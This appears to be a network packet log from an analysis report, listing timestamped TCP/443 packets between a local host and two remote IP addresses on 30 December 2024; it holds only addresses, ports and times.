                                                                                                                Dec 30, 2024 11:59:37.452264071 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.458281040 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.458327055 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.458348989 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.458359957 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.458379984 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.458403111 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.531593084 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.531610966 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.531677008 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.531693935 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.531744957 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.532146931 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.532164097 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.532219887 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.532229900 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.532278061 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.532723904 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.532738924 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.532790899 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.532799006 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.532814026 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.532839060 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.539005995 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.539021969 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.539072990 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.539082050 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.539119959 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.539279938 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.539295912 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.539341927 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.539350033 CET44349731185.199.110.133192.168.2.4
Dec 30, 2024 11:59:37.539390087 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.539771080 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.539788008 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.539839029 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.539845943 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.539890051 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.540168047 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.540209055 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.540226936 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.540237904 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.540256977 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.540280104 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.546725988 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.546762943 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.546827078 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.546838999 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.546885967 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.619944096 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.620002031 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.620034933 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.620049000 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.620074987 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.620110989 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.620323896 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.620337963 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.620393038 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.620400906 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.620440960 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.620865107 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.620878935 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.620938063 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.620946884 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.620985985 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.627103090 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.627118111 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.627171993 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.627182007 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.627222061 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.627671957 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.627686977 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.627743006 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.627756119 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.627791882 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.628099918 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.628113985 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.628160954 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.628171921 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.628210068 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.628599882 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.628613949 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.628678083 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.628690958 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.628750086 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.635099888 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.635116100 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.635339022 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.635354042 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.635401964 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.708515882 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.708537102 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.708602905 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.708615065 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.708661079 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.708830118 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.708843946 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.708900928 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.708909988 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.708925962 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.708949089 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.709305048 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.709321022 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.709381104 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.709391117 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.709449053 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.715559959 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.715576887 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.715636969 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.715645075 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.715689898 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.716033936 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.716048956 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.716119051 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.716128111 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.716172934 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.716603994 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.716618061 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.716674089 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.716681957 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.716727972 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.717047930 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.717072964 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.717103004 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.717111111 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.717145920 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.717160940 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.723406076 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.723421097 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.723467112 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.723476887 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.723500013 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.723526001 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.796829939 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.796849012 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.796972036 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.796984911 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.797039032 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.797072887 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.797111034 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.797139883 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.797146082 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.797159910 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.797687054 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.797702074 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.797759056 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.797768116 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.798198938 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.798226118 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.798254013 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.798264980 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.798294067 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.804152966 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.804178953 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.804207087 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.804214954 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.804233074 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.804663897 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.804677963 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.804738045 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.804748058 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.805160999 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.805174112 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.805227041 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.805236101 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.805449963 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.805463076 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.805516958 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.805526972 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.854152918 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.885390043 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.885407925 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.885514021 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.885520935 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.885545969 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.885560036 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.885566950 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.885577917 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.885611057 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.885634899 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.886070013 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.886084080 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.886158943 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.886167049 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.886215925 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.886636972 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.886656046 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.886708021 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.886715889 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.886759043 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.892498970 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.892514944 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.892575979 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.892581940 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.892628908 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.893023968 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.893038988 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.893084049 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.893093109 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.893104076 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.893135071 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.893440008 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.893452883 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.893511057 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.893517971 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.893558979 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.893958092 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.893974066 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.894031048 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.894037962 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.894081116 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.973777056 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.973798990 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.974001884 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.974014044 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.974025965 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.974045038 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.974061012 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.974071026 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.974111080 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.974144936 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.974381924 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.974395990 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.974447012 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.974453926 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.974489927 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.974514008 CET  49731  443    192.168.2.4      185.199.110.133
Dec 30, 2024 11:59:37.975059986 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.975075960 CET  443    49731  185.199.110.133  192.168.2.4
Dec 30, 2024 11:59:37.975133896 CET  49731  443    192.168.2.4      185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.975142002 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.975182056 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.980798960 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.980813980 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.980875015 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.980884075 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.980923891 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.981367111 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.981391907 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.981424093 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.981431007 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.981472015 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.981491089 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.982028961 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.982043028 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.982098103 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.982105017 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.982147932 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.982333899 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.982348919 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.982403040 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.982410908 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.982454062 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.061952114 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.061970949 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.062072992 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.062084913 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.062134027 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.062340021 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.062355042 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.062407970 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.062414885 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.062453032 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.063057899 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.063075066 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.063148022 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.063154936 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.063203096 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.063632965 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.063651085 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.063708067 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.063716888 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.063760042 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.069381952 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.069400072 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.069447994 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.069457054 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.069511890 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.069659948 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.069726944 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.069741964 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.069801092 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.069807053 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.069847107 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.070360899 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.070384979 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.070420980 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.070426941 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.070457935 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.070477009 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.070894003 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.070909977 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.070974112 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.070985079 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.071022987 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.150298119 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.150315046 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.150388002 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.150410891 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.150455952 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.150513887 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.150567055 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.150573015 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.150594950 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.150654078 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.151068926 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:38.546778917 CET49732443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:38.546837091 CET44349732104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:38.546901941 CET49732443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:38.576123953 CET49732443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:38.576163054 CET44349732104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:39.044251919 CET44349732104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:39.044317007 CET49732443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:39.046643972 CET49732443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:39.046654940 CET44349732104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:39.046895027 CET44349732104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:39.088397026 CET49732443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:39.104443073 CET49732443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:39.104473114 CET49732443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:39.104533911 CET44349732104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:39.509236097 CET44349732104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:39.509347916 CET44349732104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:39.509474993 CET49732443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:39.511408091 CET49732443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:39.511429071 CET44349732104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:39.511442900 CET49732443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:39.511452913 CET44349732104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:39.519629955 CET49733443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:39.519686937 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:39.519757986 CET49733443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:39.520114899 CET49733443192.168.2.4104.21.18.19
